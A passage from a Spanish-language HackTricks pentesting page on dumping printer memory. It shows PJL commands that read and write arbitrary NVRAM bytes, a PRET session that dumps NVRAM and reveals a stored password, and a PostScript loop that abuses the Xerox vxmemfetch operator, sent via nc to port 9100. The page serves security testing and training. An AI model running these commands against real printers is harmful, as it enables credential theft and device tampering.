hacktricks/network-services-pentesting/pentesting-printers/memory-access.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

4.8 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Puedes intentar volcar la NVRAM y extraer información confidencial (como contraseñas) desde allí.

En PJL (Brother) puedes acceder a direcciones NVRAM arbitrarias usando PJL como se muestra a continuación:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

Puedes probar este ataque usando PRET:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

Ciertos modelos de impresoras Xerox tienen un operador PostScript propietario llamado vxmemfetch, el cual permite a un atacante leer direcciones de memoria arbitrarias. Usando un bucle PostScript, esta característica puede ser fácilmente utilizada para volcar toda la memoria como se muestra a continuación (PRET no tiene este ataque, por lo que necesitarás enviar esta carga útil al puerto 9100 en una conexión nc):

/counter 0 def 50000 {
  /counter counter 1 add def
  currentdict /RRCustomProcs /ProcSet findresource begin
  begin counter 1 false vxmemfetch end end == counter
} repeat

Más información aquí: http://hacking-printers.net/wiki/index.php/Memory_access

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥